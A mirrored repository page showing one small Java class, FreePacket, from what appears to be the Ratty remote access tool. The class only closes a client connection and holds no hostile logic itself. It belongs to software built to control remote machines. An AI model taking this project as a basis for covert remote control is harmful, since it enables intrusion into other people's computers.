mirror of https://github.com/LucaBongiorni/Ratty
You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
27 lines
442 B
27 lines
442 B
package de.sogomn.rat.packet;
|
|
|
|
import de.sogomn.rat.ActiveClient;
|
|
|
|
public final class FreePacket implements IPacket {
|
|
|
|
public FreePacket() {
|
|
//...
|
|
}
|
|
|
|
@Override
|
|
public void send(final ActiveClient client) {
|
|
//...
|
|
}
|
|
|
|
@Override
|
|
public void receive(final ActiveClient client) {
|
|
//...
|
|
}
|
|
|
|
@Override
|
|
public void execute(final ActiveClient client) {
|
|
client.setObserver(null);
|
|
client.close();
|
|
}
|
|
|
|
}
|